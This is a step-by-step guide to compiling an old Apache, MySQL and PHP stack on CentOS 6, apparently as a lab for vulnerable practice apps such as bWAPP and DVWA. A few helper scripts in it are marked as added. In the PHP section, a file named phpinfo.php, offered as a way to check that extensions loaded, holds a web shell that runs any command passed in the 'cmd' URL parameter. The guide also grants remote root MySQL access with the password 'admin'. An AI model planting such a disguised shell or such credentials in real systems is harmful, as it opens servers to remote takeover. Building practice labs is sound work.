1. First, deploy Apache
0x01 Continuing with the system we prepared earlier: first, upload all the source packages to be installed to the server. The package list is as follows:
```text
httpd-2.2.34.tar.gz
libiconv-1.14.tar.gz
libmcrypt-2.5.8.tar.gz
mcrypt-2.6.8.tar.gz
mhash-0.9.9.9.tar.gz
mysql-5.1.68.tar.gz
php-5.2.17.tar.gz
cronolog-1.6.2.tar.gz
```
The overall stack to be built this time is:
```text
httpd 2.2.34 + mysql 5.1.68 + centOS 6.8_x64 + php 5.2.17
```
0x02 Compile and install httpd 2.2.34. Before that, install the dependency libraries it needs; the full procedure is:
```shell
# yum install zlib zlib-devel gcc-c++ -y
# tar xf httpd-2.2.34.tar.gz && cd httpd-2.2.34
# ./configure --prefix=/usr/local/httpd-2.2.34 \
    --enable-deflate \
    --enable-expires \
    --enable-headers \
    --enable-modules=most \
    --enable-so \
    --with-mpm=worker \
    --enable-rewrite
# make && make install
# echo $?
```
0x03 Drop the version number from the Apache path with a symlink (so later management scripts are easier to write), start httpd, and add it to the system startup
```shell
# ln -s /usr/local/httpd-2.2.34/ /usr/local/httpd
# cd /usr/local/httpd && ll
# /usr/local/httpd/bin/apachectl -l
# vi /usr/local/httpd/conf/httpd.conf
ServerName localhost:80
# /usr/local/httpd/bin/apachectl start
# echo "/usr/local/httpd/bin/apachectl start" >> /etc/rc.local
# cd /usr/local/httpd/conf/ && cp httpd.conf httpd.conf.bak && egrep -v "^$|#" httpd.conf.bak > httpd.conf
# /usr/local/httpd/bin/apachectl -t
# /usr/local/httpd/bin/apachectl graceful
```
0x04 Notes on using the apachectl tool
```shell
# /usr/local/httpd/bin/apachectl -h
# /usr/local/httpd/bin/apachectl -l
# /usr/local/httpd/bin/apachectl -M
```
0x05 Edit Apache's main configuration file httpd.conf, enable the extra configuration includes, and define the web directories. Create the service user and the web directories first; the full httpd.conf then follows:
```shell
# useradd tmp -s /sbin/nologin -M
# mkdir /var/html/{bwapp,wp,discuz,drupal,joomla,phpcms,phpbb,dvwa} -p
```
```apache
ServerRoot "/usr/local/httpd-2.2.34"
Listen 80
<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
User tmp
Group tmp
</IfModule>
</IfModule>
ServerAdmin seclamp@sec.com
ServerName localhost:80
DocumentRoot "/usr/local/httpd-2.2.34/htdocs"
<Directory />
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>
<Directory "/usr/local/httpd-2.2.34/htdocs">
    Options Indexes FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
<IfModule dir_module>
    DirectoryIndex index.html
</IfModule>
<FilesMatch "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy All
</FilesMatch>
ErrorLog "logs/error_log"
LogLevel warn
<IfModule log_config_module>
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    <IfModule logio_module>
        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>
    CustomLog "logs/access_log" common
</IfModule>
<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/usr/local/httpd-2.2.34/cgi-bin/"
</IfModule>
<IfModule cgid_module>
</IfModule>
<Directory "/usr/local/httpd-2.2.34/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>
DefaultType text/plain
<IfModule headers_module>
    RequestHeader unset Proxy early
</IfModule>
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
</IfModule>
<IfModule ssl_module>
    SSLRandomSeed startup builtin
    SSLRandomSeed connect builtin
</IfModule>
Include conf/extra/httpd-vhosts.conf
Include conf/extra/httpd-mpm.conf
Include conf/extra/httpd-default.conf
<Directory "/var/html">
    Options FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
```
0x06 Edit the httpd-vhosts.conf extra configuration file and add name-based virtual hosts
```apache
NameVirtualHost *:80
<VirtualHost *:80>
    ServerAdmin bwapp@bwapp.com
    DocumentRoot "/var/html/bwapp"
    ServerName www.bwapp.com
    ServerAlias www.bwapp.com
    ErrorLog "logs/bwapp-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/bwapp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin wp@wp.com
    DocumentRoot "/var/html/wp"
    ServerName wp.com
    ServerAlias www.wp.com
    ErrorLog "logs/wp-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/wp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin discuz@discuz.com
    DocumentRoot "/var/html/discuz"
    ServerName discuz.com
    ServerAlias www.discuz.com
    ErrorLog "logs/discuz-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/discuz-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin drupal@drupal.com
    DocumentRoot "/var/html/drupal"
    ServerName drupal.com
    ServerAlias www.drupal.com
    ErrorLog "logs/drupal-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/drupal-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin joomla@joomla.com
    DocumentRoot "/var/html/joomla"
    ServerName joomla.com
    ServerAlias www.joomla.com
    ErrorLog "logs/joomla-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/joomla-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin phpcms@phpcms.com
    DocumentRoot "/var/html/phpcms"
    ServerName phpcms.com
    ServerAlias www.phpcms.com
    ErrorLog "logs/phpcms-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phpcms-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin phpbb@phpbb.com
    DocumentRoot "/var/html/phpbb"
    ServerName phpbb.com
    ServerAlias www.phpbb.com
    ErrorLog "logs/phpbb-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phpbb-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin dvwa@bwapp.com
    DocumentRoot "/var/html/dvwa"
    ServerName dvwa.com
    ServerAlias www.dvwa.com
    ErrorLog "logs/dvwa-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/dvwa-access_%Y%m%d.log" combined
</VirtualHost>
```
0x07 Use the cronolog tool to rotate the logs automatically: build it, then change the CustomLog line in each virtual host to the format shown below
```shell
# tar xf cronolog-1.6.2.tar.gz
# cd cronolog-1.6.2
# ./configure && make && make install
# echo $?
```
```apache
# vi /usr/local/httpd/conf/extra/httpd-vhosts.conf
<VirtualHost *:80>
    ServerAdmin phpbb@phpbb.com
    DocumentRoot "/var/html/phpbb"
    ServerName phpbb.com
    ServerAlias www.phpbb.com
    ErrorLog "logs/phpbb-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phpbb-access_%Y%m%d.log" combined
</VirtualHost>
```
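Eight near-identical hand-written blocks are where copy-paste slips in the log names and domains creep in. The script below is an added example (not from the original post): it generates the 0x06 virtual hosts with the 0x07 cronolog CustomLog line from a site list, assuming the post's paths (/var/html/<site>, /usr/local/sbin/cronolog, /usr/local/httpd/logs); the ServerAdmin addresses are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): generate the VirtualHost blocks the
# post writes out by hand in 0x06, each with the cronolog-rotated daily access log
# from 0x07. Assumes the post's paths (/var/html/<site>, /usr/local/sbin/cronolog,
# /usr/local/httpd/logs); the ServerAdmin addresses are constructed placeholders.
gen_vhost() {
  site=$1 domain=$2
  cat <<EOF
<VirtualHost *:80>
    ServerAdmin ${site}@${domain}
    DocumentRoot "/var/html/${site}"
    ServerName ${domain}
    ServerAlias www.${domain}
    ErrorLog "logs/${site}-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/${site}-access_%Y%m%d.log" combined
</VirtualHost>
EOF
}

# Read "site domain" pairs from stdin and emit a complete httpd-vhosts.conf.
gen_vhosts_conf() {
  echo "NameVirtualHost *:80"
  while read -r site domain; do
    [ -n "$site" ] && [ -n "$domain" ] || continue   # skip blank or incomplete lines
    gen_vhost "$site" "$domain"
  done
}

# Constructed sample list (the site names the post uses).
SITES='bwapp bwapp.com
wp wp.com
discuz discuz.com
drupal drupal.com
joomla joomla.com
phpcms phpcms.com
phpbb phpbb.com
dvwa dvwa.com'

# Usage (writes the file edited in 0x06, then reloads as in 0x03):
#   printf '%s\n' "$SITES" | gen_vhosts_conf > /usr/local/httpd/conf/extra/httpd-vhosts.conf
#   /usr/local/httpd/bin/apachectl -t && /usr/local/httpd/bin/apachectl graceful
```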
0x08 Initial Apache tuning
Adjust Apache's default concurrency
```apache
# vi /usr/local/httpd/conf/extra/httpd-mpm.conf
<IfModule mpm_worker_module>
    StartServers          2
    MaxClients          300
    MinSpareThreads      45
    MaxSpareThreads      75
    ThreadsPerChild      25
    MaxRequestsPerChild   0
</IfModule>
```
Hide the Apache version number at the configuration-file level
```apache
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
UseCanonicalName Off
AccessFileName .htaccess
ServerTokens Prod
ServerSignature Off
HostnameLookups Off
```
```shell
# /usr/local/httpd/bin/apachectl -t
# /usr/local/httpd/bin/apachectl graceful
```
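`apachectl -t` only checks syntax; it will not tell you whether the settings from 0x05 and 0x08 actually survived the edits. The audit function below is an added example (not from the original post) that checks a stripped httpd.conf for ServerTokens Prod, ServerSignature Off, the default deny on `<Directory />`, the `.ht*` FilesMatch block, and flags `Options Indexes`; the sample configuration is constructed from the post's own directives.

```shell
#!/bin/sh
# Added example (not from the original post): audit an httpd.conf for the settings the
# post uses to hide the version and lock down the filesystem (ServerTokens Prod,
# ServerSignature Off, default deny on "/", .ht* blocked) and flag directory listings.
audit_httpd_conf() {
  conf=$1 findings=0
  # Drop comments and blank lines, as the post does with egrep -v "^$|#".
  body=$(grep -Ev '^[[:space:]]*(#|$)' "$conf")
  need() {  # need <regex> <message>: record a finding when no line matches
    if ! printf '%s\n' "$body" | grep -Eiq "$1"; then
      echo "MISSING: $2"; findings=$((findings + 1))
    fi
  }
  need '^[[:space:]]*ServerTokens[[:space:]]+Prod[[:space:]]*$' 'ServerTokens Prod (version in Server header)'
  need '^[[:space:]]*ServerSignature[[:space:]]+Off' 'ServerSignature Off (version on error pages)'
  # "/" must be default-deny; later <Directory> blocks open only what is served.
  if ! printf '%s\n' "$body" | sed -n '/<Directory \/>/,/<\/Directory>/p' | grep -Eiq 'Deny from all'; then
    echo "MISSING: <Directory /> does not Deny from all"; findings=$((findings + 1))
  fi
  # .htaccess / .htpasswd must never be served to clients.
  if ! printf '%s\n' "$body" | sed -n '/<FilesMatch.*\.ht/,/<\/FilesMatch>/p' | grep -Eiq 'Deny from all'; then
    echo "MISSING: FilesMatch block denying .ht* files"; findings=$((findings + 1))
  fi
  # "Options Indexes" (but not "-Indexes") lists any directory lacking an index file.
  if printf '%s\n' "$body" | grep -Eiq '^[[:space:]]*Options([[:space:]]+[^[:space:]]+)*[[:space:]]+\+?Indexes([[:space:]]|$)'; then
    echo "WARN: Options Indexes enabled (directory listing)"; findings=$((findings + 1))
  fi
  [ "$findings" -eq 0 ]   # exit status 0 only when nothing was flagged
}

# Constructed sample: the post's 0x05/0x08 directives, with the stock
# "Options Indexes FollowSymLinks" still on the DocumentRoot.
SAMPLE_CONF=$(mktemp)
cat >"$SAMPLE_CONF" <<'EOF'
ServerTokens Prod
ServerSignature Off
<Directory />
    Options FollowSymLinks
    Deny from all
</Directory>
<Directory "/usr/local/httpd-2.2.34/htdocs">
    Options Indexes FollowSymLinks
    Allow from all
</Directory>
<FilesMatch "^\.ht">
    Deny from all
</FilesMatch>
EOF
# Usage on the real file: audit_httpd_conf /usr/local/httpd/conf/httpd.conf
```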
2. Deploy MySQL
Create the MySQL service user
```shell
# groupadd mysql
# useradd mysql -s /sbin/nologin -M -g mysql
```
Compile and install mysql-5.1.68 with the following configure options:
```shell
# yum install ncurses-devel openssl openssl-devel -y
# tar xf mysql-5.1.68.tar.gz
# cd mysql-5.1.68
# ./configure \
    --prefix=/usr/local/mysql-5.1.68 \
    --with-unix-socket-path=/usr/local/mysql-5.1.68/tmp/mysql.sock \
    --localstatedir=/usr/local/mysql-5.1.68/data \
    --enable-assembler \
    --enable-thread-safe-client \
    --enable-static \
    --with-mysqld-user=mysql \
    --with-big-tables \
    --without-debug \
    --with-pthread \
    --with-charset=utf8 \
    --with-extra-charsets=all \
    --with-readline \
    --with-ssl \
    --with-embedded-server \
    --enable-local-infile \
    --with-plugins=max \
    --with-plugins=partition,innobase \
    --with-mysqld-ldflags=-all-static \
    --with-client-ldflags=-all-static
# make && make install
# echo $?
# ln -s /usr/local/mysql-5.1.68/ /usr/local/mysql
```
Quick MySQL initialization
```shell
# cp support-files/my-small.cnf /etc/my.cnf
# mkdir /usr/local/mysql/data
# chown -R mysql.mysql /usr/local/mysql
# /usr/local/mysql/bin/mysql_install_db --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql
# chown -R root.root /usr/local/mysql/
# chown -R mysql.mysql /usr/local/mysql/{tmp,data}
# /usr/local/mysql/bin/mysqld_safe &
# echo "/usr/local/mysql/bin/mysqld_safe &" >> /etc/rc.local
# lsof -i :3306
# cp /usr/local/mysql/bin/* /usr/local/sbin/
# mysqladmin -uroot password "admin"
```
```shell
# mysql -uroot -p
mysql> drop database test;
mysql> select user,host from mysql.user;
mysql> drop user ''@'localhost';
mysql> drop user ''@'seclamp';
mysql> drop user 'root'@'seclamp';
mysql> grant all on *.* to 'root'@'%' identified by 'admin' with grant option;flush privileges;
```
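The account cleanup above is typed against whatever `select user,host from mysql.user` happens to show on a given host. The function below is an added example (not from the original post): it reads that table in `mysql -t` format, emits the DROP USER statements for every anonymous account and every root account not bound to the local host, and warns about the `'root'@'%'` account that the final GRANT creates. The sample table is constructed for a host named `seclamp`, as in the post.

```shell
#!/bin/sh
# Added example (not from the original post): turn the table that
# "select user,host from mysql.user" prints into the DROP USER statements the post
# types by hand (every anonymous account, every root account not bound to the local
# host) and warn about 'root'@'%', which the post's final GRANT creates.
trim() { printf '%s' "$1" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//'; }

mysql_account_cleanup() {
  drops=0
  while IFS='|' read -r _ user host _; do
    user=$(trim "$user"); host=$(trim "$host")
    [ -n "$host" ] && [ "$user" != user ] || continue   # skip +---+ borders and header
    case "$user" in
      '')   echo "DROP USER ''@'${host}';"; drops=$((drops + 1)) ;;
      root) case "$host" in
              localhost|127.0.0.1|::1) ;;   # keep local root
              '%') echo "-- WARNING: 'root'@'%' is reachable from any host; restrict it" ;;
              *)   echo "DROP USER 'root'@'${host}';"; drops=$((drops + 1)) ;;
            esac ;;
    esac
  done
  [ "$drops" -gt 0 ] && echo "FLUSH PRIVILEGES;"
  return 0
}

# Constructed sample: what a fresh install on a host named "seclamp" shows, plus the
# 'root'@'%' account the post's GRANT adds.
SAMPLE_USERS='+------+-----------+
| user | host      |
+------+-----------+
| root | 127.0.0.1 |
| root | localhost |
| root | seclamp   |
| root | %         |
|      | localhost |
|      | seclamp   |
+------+-----------+'

# Usage: mysql -uroot -p -t -e "select user,host from mysql.user" | mysql_account_cleanup
```

Review the generated statements before feeding them back to `mysql`; the function only prints, it never connects.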
3. Deploy PHP
Install all the required dependency libraries
```shell
# yum install -y zlib zlib-devel libxml2-devel libjpeg
# yum install -y libjpeg-devel libpng libpng-devel libxslt-devel
# yum install -y freetype freetype-devel gd gd-devel curl curl-devel
# yum install epel-release -y
# yum install libmcrypt libmcrypt-devel mcrypt mhash mhash-devel openssl openssl-devel bzip2-devel -y
# wget https://ftp.gnu.org/gnu/libiconv/libiconv-1.14.tar.gz
# tar xf libiconv-1.14.tar.gz
# cd libiconv-1.14 && ./configure --prefix=/usr/local/libiconv && make && make install
# ln -s /usr/lib64/libjpeg.so /usr/lib/libjpeg.so
# ln -s /usr/lib64/libpng.so /usr/lib/libpng.so
# yum install libtool libtool-ltdl-devel -y
```
Compile and install PHP 5.2.17. When copying the configure command, pay close attention to the spacing around the line continuations.
```shell
# tar xf php-5.2.17.tar.gz
# cd php-5.2.17
# ./configure \
    --prefix=/usr/local/php-5.2.17 \
    --with-apxs2=/usr/local/httpd/bin/apxs \
    --with-mysql=/usr/local/mysql \
    --with-pdo-mysql=/usr/local/mysql \
    --with-config-file-path=/etc \
    --with-config-file-scan-dir=/etc/php.d \
    --with-xmlrpc \
    --with-openssl \
    --with-zlib \
    --with-bz2 \
    --with-gettext \
    --with-mhash \
    --with-mcrypt \
    --with-libxml-dir \
    --with-iconv=/usr/local/libiconv \
    --with-curl \
    --with-gd \
    --with-jpeg-dir \
    --with-png-dir \
    --with-freetype-dir \
    --enable-gd-native-ttf \
    --enable-bcmath \
    --enable-mbstring \
    --enable-zip \
    --enable-soap \
    --enable-sockets \
    --enable-ftp \
    --enable-static \
    --enable-zend-multibyte \
    --without-pear
# echo "#LoadModule php5_module /usr/local/httpd-2.2.34/modules/libphp5.so" >> httpd.conf
# make && make install
# ln -s /usr/local/php-5.2.17/ /usr/local/php
# ll /usr/local/httpd/modules/
# grep "libphp5" /usr/local/httpd/conf/httpd.conf
# cp php.ini-dist /etc/php.ini
```
Install the various PHP extensions
```shell
# yum install autoconf -y
# cd ext/mysqli/
# /usr/local/php/bin/phpize
# ./configure --prefix=/usr/local/mysqli \
    --with-php-config=/usr/local/php/bin/php-config \
    --with-mysqli=/usr/local/mysql/bin/mysql_config
# make && make install
# ls /usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/
# vi /etc/php.ini
extension_dir = "/usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/"
extension=mysqli.so
```
```apache
<IfModule dir_module>
    DirectoryIndex index.php index.html
</IfModule>
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
    AddType application/x-httpd-php .php
</IfModule>
```
Now go back and check carefully that the extensions just compiled really are loaded, and that the web service is running as the user you configured
```php
# vi /var/html/bwapp/phpinfo.php
<?php
echo "<pre>";
@system($_GET['cmd']);
echo "</pre>";
phpinfo();
?>
```
4. Install various open-source applications to fully test that the environment works
Install the bWAPP vulnerability practice application
Install the DVWA vulnerability practice application
Install Discuz X3.2
Install Drupal 7.56
Install WordPress 4.8.1
Install Joomla 3.6.5
...
End
Write scripts, write scripts, write scripts: important things get said three times. Or, more bluntly, build an RPM package once everything is configured. Also, this environment is only for my own study, so essentially no hardening has been done on it; it must not be used as a reference for a real production environment, otherwise all consequences are your own responsibility.